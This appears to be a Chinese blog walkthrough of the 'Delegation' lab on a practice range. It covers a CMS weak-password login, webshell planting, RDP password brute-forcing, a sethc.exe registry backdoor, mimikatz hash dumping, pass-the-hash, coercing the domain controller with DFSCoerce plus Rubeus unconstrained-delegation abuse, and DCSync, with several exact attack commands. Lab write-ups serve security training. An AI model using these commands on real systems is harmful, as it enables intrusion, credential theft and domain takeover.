

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/Avatar.jpg">
  <link rel="icon" href="/img/Avatar.jpg">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="suuuu">
  <meta name="keywords" content="blog">
  
    <meta name="description" content="春秋云境-Delegation先做一波信息收集  扫描的有点慢，弱口令爆破先不管了，看看80  cms easy 找找nday试试先 https:&#x2F;&#x2F;blog.csdn.net&#x2F;jie_a&#x2F;article&#x2F;details&#x2F;119737670 搜到第一篇就是这个，拼接路径&#x2F;admin进行访问，然后账号密码不是默认的，手动试了下，admin&#x2F;123456  成功进入后台 可能版本有">
<meta property="og:type" content="article">
<meta property="og:title" content="春秋云境-Delegation">
<meta property="og:url" content="https://www.susec.xyz/2025/05/13/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9C-Delegation/index.html">
<meta property="og:site_name" content="suuuu&#39;s blog">
<meta property="og:description" content="春秋云境-Delegation先做一波信息收集  扫描的有点慢，弱口令爆破先不管了，看看80  cms easy 找找nday试试先 https:&#x2F;&#x2F;blog.csdn.net&#x2F;jie_a&#x2F;article&#x2F;details&#x2F;119737670 搜到第一篇就是这个，拼接路径&#x2F;admin进行访问，然后账号密码不是默认的，手动试了下，admin&#x2F;123456  成功进入后台 可能版本有">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512113323320.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512113342366.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512113354931.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512114319596.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512114344162.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512114411272.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512114425892.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512114440769.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512114455038.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512114513533.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512114640109.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512114648565.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512114702816.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512114711721.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512114721096.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512114731554.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512114740126.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512114748724.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512114827184.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512114836450.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512114843758.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512114852093.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512114925888.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512114937400.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512114943055.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512115004487.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512115010460.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512115020984.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512122515074.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512122520524.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512122525938.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512122533436.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512122538208.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512122555164.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512122600076.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512122611183.png">
<meta property="article:published_time" content="2025-05-12T16:00:00.000Z">
<meta property="article:modified_time" content="2025-05-12T04:38:53.885Z">
<meta property="article:author" content="suuuu">
<meta property="article:tag" content="打靶">
<meta property="article:tag" content="内网">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512113323320.png">
  
  
  
  <title>春秋云境-Delegation - suuuu&#39;s blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"www.susec.xyz","root":"/","version":"1.9.7","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":"A3t4PtWLmbagcqhmt5hLbHws-MdYXbMMI","app_key":"HVBQatbtbgezZh05pZTT4NW5","server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  

  
    <!-- Google tag (gtag.js) -->
    <script async>
      if (!Fluid.ctx.dnt) {
        Fluid.utils.createScript("https://www.googletagmanager.com/gtag/js?id=", function() {
          window.dataLayer = window.dataLayer || [];
          function gtag() {
            dataLayer.push(arguments);
          }
          gtag('js', new Date());
          gtag('config', '');
        });
      }
    </script>
  

  

  

  

  
    
  



  
<meta name="generator" content="Hexo 7.2.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>suuuu</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/BlackRoses.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="春秋云境-Delegation"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2025-05-13 00:00" pubdate>
          2025年5月13日 凌晨
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          1.1k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          10 分钟
        
      </span>
    

    
    
      
        <span id="leancloud-page-views-container" class="post-meta" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="leancloud-page-views"></span>次
        </span>
        
      
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">春秋云境-Delegation</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="春秋云境-Delegation"><a href="#春秋云境-Delegation" class="headerlink" title="春秋云境-Delegation"></a>春秋云境-Delegation</h1><p>先做一波信息收集</p>
<p><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512113323320.png" srcset="/img/loading.gif" lazyload alt="image-20250417104357408"></p>
<p>扫描的有点慢，弱口令爆破先不管了，看看80</p>
<p><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512113342366.png" srcset="/img/loading.gif" lazyload alt="image-20250417104500112"></p>
<p>cms easy</p>
<p>找找nday试试先</p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/jie_a/article/details/119737670">https://blog.csdn.net/jie_a/article/details/119737670</a></p>
<p>搜到第一篇就是这个，拼接路径&#x2F;admin进行访问，然后账号密码不是默认的，手动试了下，admin&#x2F;123456</p>
<p><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512113354931.png" srcset="/img/loading.gif" lazyload alt="image-20250417104759648"></p>
<p>成功进入后台</p>
<p>可能版本有点不一样，但大致操作相同，找到模板，加上一句话木马</p>
<p><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512114319596.png" srcset="/img/loading.gif" lazyload alt="image-20250417112032325"></p>
<p><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512114344162.png" srcset="/img/loading.gif" lazyload alt="image-20250417112055922"></p>
<p>在home目录下找到flag但是没有读的权限</p>
<p><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512114411272.png" srcset="/img/loading.gif" lazyload alt="image-20250417112157774"></p>
<p>我们先传vshell</p>
<p><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512114425892.png" srcset="/img/loading.gif" lazyload alt="image-20250417113135916"></p>
<p><a target="_blank" rel="noopener" href="https://gtfobins.github.io/gtfobins/diff/">https://gtfobins.github.io/gtfobins/diff/</a></p>
<p>我们用diff读一下flag就行了，提不提权的没关系</p>
<p><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512114440769.png" srcset="/img/loading.gif" lazyload alt="image-20250417113509353"></p>
<p>然后我们做代理打内网即可</p>
<p>内网ip:172.22.4.36</p>
<p>fscan再扫一波</p>
<p><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512114455038.png" srcset="/img/loading.gif" lazyload alt="image-20250417155048365"></p>
<p>ip整理一下7,19,45，还有个36是本机就不看了</p>
<p>以下是整理图：</p>
<p><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512114513533.png" srcset="/img/loading.gif" lazyload alt="image-20250418210446082"></p>
<p>根据flag1的提示要打win19也就是45，已知一个账号名Adrian</p>
<p>因为我们还有3306开着，连一下数据库看看</p>
<p><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512114640109.png" srcset="/img/loading.gif" lazyload alt="image-20250417155744967"></p>
<p><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512114648565.png" srcset="/img/loading.gif" lazyload alt="image-20250417160351151"></p>
<p>连数据库是因为他开了3306，而且只给了账号没给密码，我以为数据库里哪怕没有直接给出密码，也可能给出密码表，但是事实并没有如我所愿，所以这里只能试着去爆破密码<br><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512114702816.png" srcset="/img/loading.gif" lazyload alt="image-20250417160702760"></p>
<p>非常慢，我个人认为这个爆破不合理，谁会拿rockyou去爆破，时间就是金钱，密码是babygirl1<br>我们试着远程连接</p>
<p><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512114711721.png" srcset="/img/loading.gif" lazyload alt="image-20250417160850495"></p>
<p>提示密码过期，我们用kali命令行连<br>proxychains4 rdesktop 172.22.4.45 -u Adrian -d WIN19 -p ‘babygirl1’<br><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512114721096.png" srcset="/img/loading.gif" lazyload alt="image-20250417161123981"></p>
<p>连上去改个密码就行</p>
<p><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512114731554.png" srcset="/img/loading.gif" lazyload alt="image-20250417161308056"><br>看到桌面有这个文件，其实从意思角度看也很有意思权限检查，看着像是被人打过了留的痕迹，我们打开html看看<br><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512114740126.png" srcset="/img/loading.gif" lazyload alt="image-20250417161704961"><br>这个是说注册表权限的问题，具体可控的路径就是HKLM\SYSTEM\CurrentControlSet\Services\gupdate<br>gupdate这个服务<br>这里我们直接通过修改shift后门绑定的文件，把shift原本会弹出的弹窗即sethc.exe改为cmd.exe<br>先使用msfvenom生成一个木马<br><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512114748724.png" srcset="/img/loading.gif" lazyload alt="image-20250418000524486"></p>
<p>写一个shift.bat，对注册表进行修改</p>
<p><code>REG ADD &quot;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe&quot; /v Debugger /t REG_SZ /d &quot;C:\windows\system32\cmd.exe&quot;</code></p>
<p>执行命令</p>
<p><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512114827184.png" srcset="/img/loading.gif" lazyload alt="image-20250418000001745"></p>
<p>锁屏点几下shift</p>
<p><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512114836450.png" srcset="/img/loading.gif" lazyload alt="image-20250418000813211"></p>
<p>成功提权到system权限，我们再添加个管理员账号</p>
<p><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512114843758.png" srcset="/img/loading.gif" lazyload alt="image-20250418000938131"></p>
<p>重新远程连接</p>
<p><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512114852093.png" srcset="/img/loading.gif" lazyload alt="image-20250418001227789"></p>
<p>这里解释一下流程，首先我们看到注册表中的gupdate，这里的内容是我们可控的，而它的配置又是User: LocalSystem</p>
<p><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512114925888.png" srcset="/img/loading.gif" lazyload alt="image-20250420093506539"></p>
<p>当我们修改它的配置，使其指向我们的恶意文件，再重启服务，会自动运行配置中的文件，从而达到提权的效果。</p>
<p>同理网上还有两个比较常见的思路，一个是通过执行正向shell连接，我这里用vshell不知道为什么一直失败没有复现成功，可以试试viper，还有一个思路是把sam，security，system扒下来，然后通过secretdump把hash进行解密，大致原理都是相同的</p>
<p>读取flag<br><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512114937400.png" srcset="/img/loading.gif" lazyload alt="image-20250418001627145"></p>
<p>然后mimikatz抓一下hash</p>
<p><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512114943055.png" srcset="/img/loading.gif" lazyload alt="image-20250418003129735"></p>
<p>把有用的信息都收集一波</p>
<p>WIN19$:b87ada0ba8110968e7c99cb900ea1810</p>
<p>我们先pth到win19$这个账号，因为试过普通管理员并不在域内，这里猜测win19$是</p>
<p>sekurlsa::pth &#x2F;user:WIN19$ &#x2F;domain:xiaorang.lab &#x2F;ntlm:b87ada0ba8110968e7c99cb900ea1810</p>
<p>然后丢bloodhound做域信息收集</p>
<p><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512115004487.png" srcset="/img/loading.gif" lazyload alt="image-20250418005010270"></p>
<p>把生成的丢到bloodhound中进行分析</p>
<p><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512115010460.png" srcset="/img/loading.gif" lazyload alt="image-20250418001227789"></p>
<p>很好理解，直译是允许不受约束的委派，也就是存在非约束委派</p>
<p>按照前情提要我们打burute4road的时候就遇到过一次约束委派</p>
<p>当我们在域内拿到一台配置了非约束委派的主机后，就可以使用 mimikatz 导出所有票据，若是有其他用户访问过该主机，那么我们就可以通过 ptt 获取该用户权限</p>
<p>非约束委派可以通过模拟域管去访问非约束性委派主机，从而得到域控的哈希</p>
<p>首先我们使用rubeus对本机进行监控</p>
<p>Rubeus.exe monitor &#x2F;interval:1 &#x2F;nowrap &#x2F;targetuser:DC01$</p>
<p><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512115020984.png" srcset="/img/loading.gif" lazyload alt="image-20250418011241418"></p>
<p>然后使用DFSCoerce强制域控进行访问</p>
<p><code>git clone https://github.com/Wh04m1001/DFSCoerce.git</code></p>
<p><code>proxychains4 python3 dfscoerce.py -u WIN19$ -hashes :b87ada0ba8110968e7c99cb900ea1810 -d xiaorang.lab win19 172.22.4.7</code></p>
<p><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512122515074.png" srcset="/img/loading.gif" lazyload alt="image-20250418011750112"></p>
<p><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512122520524.png" srcset="/img/loading.gif" lazyload alt="image-20250418011904885"></p>
<p>导入票据</p>
<p><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512122525938.png" srcset="/img/loading.gif" lazyload alt="image-20250418012033883"></p>
<p>然后再刚才的bloodhound中我们看到了几个dcsync的漏洞，我们再mimikatz抓域控hash</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">mimikatz.exe <span class="hljs-string">&quot;lsadump::dcsync /domain:xiaorang.lab /user:xiaorang\Administrator&quot;</span> <span class="hljs-keyword">exit</span><br></code></pre></td></tr></table></figure>

<p><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512122533436.png" srcset="/img/loading.gif" lazyload alt="image-20250418012221154"></p>
<p><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512122538208.png" srcset="/img/loading.gif" lazyload alt="image-20250418012337374"></p>
<p>横横横</p>
<p><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512122555164.png" srcset="/img/loading.gif" lazyload alt="image-20250418012749834"></p>
<p><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512122600076.png" srcset="/img/loading.gif" lazyload alt="image-20250418013013387"></p>
<p>19跟7就都是在administrator有flag，这里不多赘述，到此已经基本完成，但是最后我们总是少不了对所有知识的梳理</p>
<p><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250512122611183.png" srcset="/img/loading.gif" lazyload alt="image-20250420092551586"></p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E6%89%93%E9%9D%B6/" class="category-chain-item">打靶</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/%E6%89%93%E9%9D%B6/" class="print-no-link">#打靶</a>
      
        <a href="/tags/%E5%86%85%E7%BD%91/" class="print-no-link">#内网</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>春秋云境-Delegation</div>
      <div>https://www.susec.xyz/2025/05/13/春秋云镜-Delegation/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>suuuu</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2025年5月13日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2025/05/12/SASCTF-AD01/" title="">
                        <span class="hidden-mobile"></span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
  
    <div class="statistics">
  
  

  
    
      <span id="leancloud-site-pv-container" style="display: none">
        总访问量 
        <span id="leancloud-site-pv"></span>
         次
      </span>
    
    
      <span id="leancloud-site-uv-container" style="display: none">
        总访客数 
        <span id="leancloud-site-uv"></span>
         人
      </span>
    
    

  
</div>

  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script defer src="/js/leancloud.js" ></script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
